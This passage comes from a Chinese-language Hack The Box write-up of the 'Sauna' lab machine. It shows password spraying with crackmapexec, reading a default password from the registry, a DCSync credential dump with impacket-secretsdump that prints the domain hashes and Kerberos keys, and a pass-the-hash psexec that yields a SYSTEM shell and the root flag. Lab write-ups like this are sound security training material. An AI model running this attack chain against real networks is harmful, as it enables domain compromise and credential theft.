INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 21S
INFO: Compressing output into 20240510175754_bloodhound.zip

18、从AD域的攻击导图上看,我们需要获取到下面这个svc_loanmgr这个账号密码才行,只能靠枚举了。我突然想起,在上面使用 winpeas 工具枚举时,发现了一个默认配置的账号密码,虽说呢个账号是不存在的,但是密码确实可以进行喷洒下,看看对不对。

1
2
3
4
5
6
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.175 -u ./targetname.txt  -p 'Moneymakestheworldgoround!' --continue-on-success
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [-] EGOTISTICAL-BANK.LOCAL\HSmith:Moneymakestheworldgoround! STATUS_LOGON_FAILURE 
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! 
SMB         10.10.10.175    445    SAUNA            [-] EGOTISTICAL-BANK.LOCAL\Administrator:Moneymakestheworldgoround! STATUS_LOGON_FAILURE

19、看来密码是对的,就是这个用户的密码,下面我们模拟了下密码搜集的方法,发现在配置表中存在一个默认密码,和上面winpeas搜集的密码一样。

1
2
3
4
*Evil-WinRM* PS C:\Users\FSmith\Documents> reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

20、下面开始尝试利用这个,下面是bloodhund提示信息

1
2
3
4
5
6
7
您可以使用impacket的secretsdump.py示例脚本执行dcsync攻击以获取任意主体的密码哈希:

secretsdump.py 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'

您还可以执行更复杂的ExtraSids攻击来跳域信任。有关这方面的信息,请参阅harmj0y在参考选项卡中的博客文章。

impacket-secretsdump 'svc_loanmgr:Moneymakestheworldgoround!@EGOTISTICAL-BANK.LOCAL'

21、开始利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump 'svc_loanmgr:Moneymakestheworldgoround!@EGOTISTICAL-BANK.LOCAL'
Impacket v0.11.0 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:a3be8e197cd4d7ff129ff402410621e2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:cdbd363c7a964052edf726a47f4e27a55d56c691672d79a67e0a969a835ce08c
SAUNA$:aes128-cts-hmac-sha1-96:3f620f1b4ea0c8746c569712aa93dee1
SAUNA$:des-cbc-md5:4908f425546bb320
[*] Cleaning up...

22、信息还是挺多的,直接哈希传递,psexec 搞起

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec Administrator@EGOTISTICAL-BANK.LOCAL -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on EGOTISTICAL-BANK.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file qpMishEp.exe
[*] Opening SVCManager on EGOTISTICAL-BANK.LOCAL.....
[*] Creating service oCjR on EGOTISTICAL-BANK.LOCAL.....
[*] Starting service oCjR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

23、读取下最终的flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
C:\Windows\system32> cd C:/Users/Administrator/Desktop
 
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\Administrator\Desktop

07/14/2021  03:35 PM    <DIR>          .
07/14/2021  03:35 PM    <DIR>          ..
05/09/2024  07:45 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,677,739,008 bytes free

C:\Users\Administrator\Desktop> type root.txt
6d781428d5fa9d3d6be398fdbbcac36a

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/229

打靶记
#shooting-range
Sauna-htb-writeup
https://sh1yan.top/2024/05/10/Sauna-htb-writeup/
作者
shiyan
发布于
2024年5月10日
许可协议